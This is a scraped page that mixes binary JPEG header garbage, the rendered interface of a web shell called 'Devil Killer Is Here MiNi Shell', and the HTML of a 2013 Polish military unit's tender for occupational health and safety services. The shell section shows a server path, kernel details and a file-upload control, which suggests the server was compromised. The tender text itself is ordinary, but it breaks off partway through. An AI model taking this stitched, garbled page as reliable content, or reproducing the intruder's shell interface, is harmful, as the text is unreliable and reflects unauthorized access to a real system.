JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130221/74074-N-2013.html

<p class="kh_header"><b>Warszawa: świadczenie usług w zakresie służby BHP</b><br>
<b>Numer ogłoszenia: 74074 - 2013; data zamieszczenia: 21.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 2063 , ul. Banacha 2, 00-909 Warszawa, woj. mazowieckie, tel. 22 6824215, 6824375, 6824121, faks 22 6824108.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zamowienia.ozdgw.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług w zakresie służby BHP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przeprowadzanie kontroli warunków pracy oraz przestrzegania przepisów i zasad bezpieczeństwa i higieny pracy,
2)	Bieżące informowanie pracodawcy o stwierdzonych zagrożeniach zawodowych, wraz z wnioskami zmierzającymi do usuwania tych zagrożeń,
3)	Sporządzanie i przedstawianie pracodawcy, co najmniej raz w roku, okresowych analiz stanu bezpieczeństwa i higieny pracy, stanu ochrony przeciwpożarowej zawierających propozycje przedsięwzięć technicznych i organizacyjnych mających na celu zapobieganie zagrożeniom życia i zdrowia pracowników oraz poprawę warunków pracy,
4)	Udział w opracowywaniu planów modernizacji i rozwoju zakładu pracy oraz przedstawianie propozycji dotyczących uwzględnienia w tych planach rozwiązań techniczno-organizacyjnych zapewniających poprawę stanu bezpieczeństwa i higieny pracy,
5)	Udział w ocenie założeń i dokumentacji dotyczących modernizacji zakładu pracy albo jego części, a także nowych inwestycji, oraz zgłaszanie wniosków dotyczących uwzględnienia wymagań bezpieczeństwa i higieny pracy w tych założeniach i do?kumentacji,
6)	Udział w przekazywaniu do użytkowania nowo budowanych lub przebudowywanych obiektów budowlanych albo ich części, w których przewiduje się pomieszczenia pracy, urządzeń produkcyjnych oraz innych urządzeń mających wpływ na warunki pracy i bez?pieczeństwo pracowników,
7)	Przedstawianie pracodawcy wniosków dotyczących zachowania wymagań ergonomii 
na stanowiskach pracy,
8)	Udział w opracowywaniu wewnętrznych zarządzeń, regulaminów i instrukcji ogólnych dotyczących bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej oraz w ustalaniu zadań osób kierujących pracownikami w zakresie bezpieczeństwa i higieny pracy,
9)	Opiniowanie szczegółowych instrukcji dotyczących bezpieczeństwa i higieny pracy na poszczególnych stanowiskach pracy,
10)	Udział w ustalaniu okoliczności i przyczyn wypadków przy pracy oraz w opra?cowywaniu wniosków wynikających z badania przyczyn i okoliczności tych wypadków oraz zachorowań na choroby zawodowe, a także kontrola realizacji tych wniosków,
11)	Prowadzenie rejestrów, kompletowanie i przechowywanie dokumentów dotyczących wypadków przy pracy, stwierdzonych chorób zawodowych i podejrzeń o takie choroby, a także przechowywanie wyników badań i pomiarów czynników szkodliwych dla zdrowia w środowisku pracy,
12)	Doradztwo w zakresie stosowania przepisów oraz zasad bezpieczeństwa i higieny pracy,
13)	Udział w dokonywaniu oceny ryzyka zawodowego, które wiąże się z wykonywaną pracą,
14)	Doradztwo w zakresie organizacji i metod pracy na stanowiskach pracy, na których występują czynniki niebezpieczne, szkodliwe dla zdrowia lub warunki uciążliwe, oraz doboru najwłaściwszych środków ochrony zbiorowej i indywidualnej,
15)	Współpraca z właściwymi komórkami organizacyjnymi lub osobami, w szczególności w zakresie organizowania i zapewnienia odpowiedniego poziomu szkoleń w dziedzinie bezpieczeństwa i higieny pracy oraz zapewnienia właściwej adaptacji zawodowej nowo zatrudnionych pracowników,
16)	Współdziałanie z lekarzem sprawującym profilaktyczną opiekę zdrowotną nad pracow?nikami, a w szczególności przy organizowaniu okresowych badań lekarskich pracow?ników,
17)	Współdziałanie ze społeczną inspekcją pracy oraz z zakładowymi organizacjami związkowymi przy:
a.	podejmowaniu przez nie działań mających na celu przestrzeganie przepisów oraz
zasad bezpieczeństwa i higieny pracy, w trybie i w zakresie ustalonym 
w odrębnych przepisach;
b.	podejmowanych przez pracodawcę przedsięwzięciach mających na celu poprawę
warunków pracy,
18)	Uczestniczenie w konsultacjach w zakresie bezpieczeństwa i higieny pracy oraz innych zakładowych komisji zajmujących się problematyką bezpieczeństwa i higieny pracy, w tym zapobieganiem chorobom zawodowym i wypadkom przy pracy,
19)	Inicjowanie i rozwijanie na terenie zakładu pracy różnych form popularyzacji problematyki bezpieczeństwa i higieny pracy oraz ergonomii,
20)	Prowadzenie w stosunku do wybranych pracowników szkoleń w zakresie pierwszej pomocy przedlekarskiej oraz z ochrony przeciwpożarowej,
21)	Nadzorowanie i zlecanie badań środowiska pracy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poświadczenie bezpieczeństwa przemysłowego co najmniej III stopnia albo 	zaświadczenie o dostępie do informacji niejawnych klauzuli co najmniej poufne w przypadku kiedy Wykonawca nie występuje jako osoba fizyczna</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie wiedzy i doświadczenia Zamawiający wymaga załączenia wykazu wykonywanych co najmniej 2 usług na wartość nie niższą niż wartość składanej oferty w zakresie niezbędnym do wykazania spełniania  warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (na formularzu określonym w zał. nr 8 do SIWZ), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykaz osób przeznaczonych do wykonania zamówienia (zał. nr 7 do SIWZ) wraz z:
a) kopią dyplomu ukończenia studiów podyplomowych z zakresu bezpieczeństwa i higieny pracy lub dyplomem ukończenia studiów o specjalności bezpieczeństwo i higiena pracy wraz z udokumentowanym co najmniej 2-letnim stażem pracy w służbie BHP, lub dokument potwierdzający wyższe wykształcenie wraz z udokumentowanym 6-letnim stażem pracy w służbie BHP;
b) kopią poświadczenia bezpieczeństwa upoważniającego do dostępu do informacji niejawnych stanowiących tajemnicę państwową, co najmniej oznaczonych klauzulą poufne (dotyczy tylko 1 części zamówienia);
c) udokumentowanym stażem pracy w zakładzie produkcyjnym o podwyższonym ryzyku zawodowym dla zatrudnionych w nim pracowników (maszyny w ruchu, hałas, stosowane szkodliwe dla zdrowia chemikalia), w zakresie zadań służby BHP (dotyczy tylko 1 części zamówienia);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na podstawie art. art. 26, ust 2d ustawy Pzp wymaga się załączenia do oferty oświadczenia o przynależności do grupy kapitałowej. (zał. nr 6 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zamowienia.ozdgw.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wykonawca może zwrócić się pisemnie na adres Zamawiającego tj. Jednostka Wojskowa 2063, ul. Banacha 2, 00-909 Warszawa, pokój 113 (kancelaria), lub faksem na nr (22) 6824-108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2013 godzina 08:45, miejsce: Jednostka Wojskowa 2063, ul. Banacha 2, 00-909 Warszawa, pokój 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I ZAMÓWIENIA 
DLA DRUKARNI WYDAWNICTW  SPECJALNYCH SG WP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przeprowadzanie kontroli warunków pracy oraz przestrzegania przepisów i zasad bezpieczeństwa i higieny pracy,
2)	Bieżące informowanie pracodawcy o stwierdzonych zagrożeniach zawodowych, wraz z wnioskami zmierzającymi do usuwania tych zagrożeń,
3)	Sporządzanie i przedstawianie pracodawcy, co najmniej raz w roku, okresowych analiz stanu bezpieczeństwa i higieny pracy, stanu ochrony przeciwpożarowej zawierających propozycje przedsięwzięć technicznych i organizacyjnych mających na celu zapobieganie zagrożeniom życia i zdrowia pracowników oraz poprawę warunków pracy,
4)	Udział w opracowywaniu planów modernizacji i rozwoju zakładu pracy oraz przedstawianie propozycji dotyczących uwzględnienia w tych planach rozwiązań techniczno-organizacyjnych zapewniających poprawę stanu bezpieczeństwa i higieny pracy,
5)	Udział w ocenie założeń i dokumentacji dotyczących modernizacji zakładu pracy albo jego części, a także nowych inwestycji, oraz zgłaszanie wniosków dotyczących uwzględnienia wymagań bezpieczeństwa i higieny pracy w tych założeniach i dokumentacji,
6)	Udział w przekazywaniu do użytkowania nowo budowanych lub przebudowywanych obiektów budowlanych albo ich części, w których przewiduje się pomieszczenia pracy, urządzeń produkcyjnych oraz innych urządzeń mających wpływ na warunki pracy i bezpieczeństwo pracowników,
7)	Przedstawianie pracodawcy wniosków dotyczących zachowania wymagań ergonomii 
na stanowiskach pracy,
8)	Udział w opracowywaniu wewnętrznych zarządzeń, regulaminów i instrukcji ogólnych dotyczących bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej oraz w ustalaniu zadań osób kierujących pracownikami w zakresie bezpieczeństwa i higieny pracy,
9)	Opiniowanie szczegółowych instrukcji dotyczących bezpieczeństwa i higieny pracy na poszczególnych stanowiskach pracy,
10)	Udział w ustalaniu okoliczności i przyczyn wypadków przy pracy oraz w opra?cowywaniu wniosków wynikających z badania przyczyn i okoliczności tych wypadków oraz zachorowań na choroby zawodowe, a także kontrola realizacji tych wniosków,
11)	Prowadzenie rejestrów, kompletowanie i przechowywanie dokumentów dotyczących wypadków przy pracy, stwierdzonych chorób zawodowych i podejrzeń o takie choroby, a także przechowywanie wyników badań i pomiarów czynników szkodliwych dla zdrowia w środowisku pracy,
12)	Doradztwo w zakresie stosowania przepisów oraz zasad bezpieczeństwa i higieny pracy,
13)	Udział w dokonywaniu oceny ryzyka zawodowego, które wiąże się z wykonywaną pracą,
14)	Doradztwo w zakresie organizacji i metod pracy na stanowiskach pracy, na których występują czynniki niebezpieczne, szkodliwe dla zdrowia lub warunki uciążliwe, oraz doboru najwłaściwszych środków ochrony zbiorowej i indywidualnej,
15)	Współpraca z właściwymi komórkami organizacyjnymi lub osobami, w szczególności w zakresie organizowania i zapewnienia odpowiedniego poziomu szkoleń w dziedzinie bezpieczeństwa i higieny pracy oraz zapewnienia właściwej adaptacji zawodowej nowo zatrudnionych pracowników,
16)	Współdziałanie z lekarzem sprawującym profilaktyczną opiekę zdrowotną nad pracow?nikami, a w szczególności przy organizowaniu okresowych badań lekarskich pracow?ników,
17)	Współdziałanie ze społeczną inspekcją pracy oraz z zakładowymi organizacjami związkowymi przy:
a.	podejmowaniu przez nie działań mających na celu przestrzeganie przepisów oraz
zasad bezpieczeństwa i higieny pracy, w trybie i w zakresie ustalonym 
w odrębnych przepisach;
b.	podejmowanych przez pracodawcę przedsięwzięciach mających na celu poprawę
warunków pracy,
18)	Uczestniczenie w konsultacjach w zakresie bezpieczeństwa i higieny pracy oraz innych zakładowych komisji zajmujących się problematyką bezpieczeństwa i higieny pracy, w tym zapobieganiem chorobom zawodowym i wypadkom przy pracy,
19)	Inicjowanie i rozwijanie na terenie zakładu pracy różnych form popularyzacji problematyki bezpieczeństwa i higieny pracy oraz ergonomii,
20)	Prowadzenie w stosunku do wybranych pracowników szkoleń w zakresie pierwszej pomocy przedlekarskiej oraz z ochrony przeciwpożarowej,
21)	Nadzorowanie i zlecanie badań środowiska pracy.
Ponadto w zakresie usług w ramach obsługi BHP należy w szczególności:
1)	Przeprowadzanie szkoleń wstępnych dla osób podejmujących pracę,
2)	Przeprowadzanie szkoleń okresowych dla 50 pracowników Drukarni, wynikających z Kodeksu pracy oraz rozporządzenia Ministra Gospodarki i Pracy w sprawie szkolenia w dziedzinie BHP,
3)	Sporządzanie z każdego szkolenia dokumentu potwierdzającego jego odbycie tj. wydanie  odpowiedniego zaświadczenia,
4)	Sporządzanie dokumentacji związanej z wypadkami przy pracy oraz w drodze do i z pracy,
5)	Terminowe wykonywanie szkoleń i ich aktualizowanie zgodnie z obowiązującymi przepisami,
6)	Monitorowanie terminów szkoleń i badań lekarskich. 
7)	Prowadzenie rejestru pracowników i przeprowadzanych szkoleń.
8)	Współudział w reprezentowaniu Zleceniodawcy przed Państwową Inspekcją Pracy, Państwową Inspekcją Sanitarną/Wojskowym Ośrodkiem Medycyny Prewencyjnej oraz przed Państwową Strażą Pożarną/Delegaturą Wojskowej Ochrony Przeciwpożarowej.
9)	Dyżur - (obsługa BHP) świadczona będzie dwa razy w tygodniu (konkretne dni tygodnia oraz godziny do odrębnego ustalenia) w siedzibie DWS SG WP 
w warszawie przy ul. Radiowej 49, w pozostałe dni możliwość konsultacji telefonicznej i komunikacji elektronicznej przez Internet z wyłączeniem dni ustawowo wolnych od pracy. W przypadkach szczególnych (wypadek przy pracy, szkolenie nowo-przyjętych pracowników, uczestnictwo w posiedzeniu komisji bhp itp.) w terminach uzgodnionych telefonicznie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II ZAMÓWIENIA 
DLA ZESPOŁU DS. SŁUŻBY W MIĘDZYNARODOWYCH STRUKTURACH WOJSKOWYCH.</p>
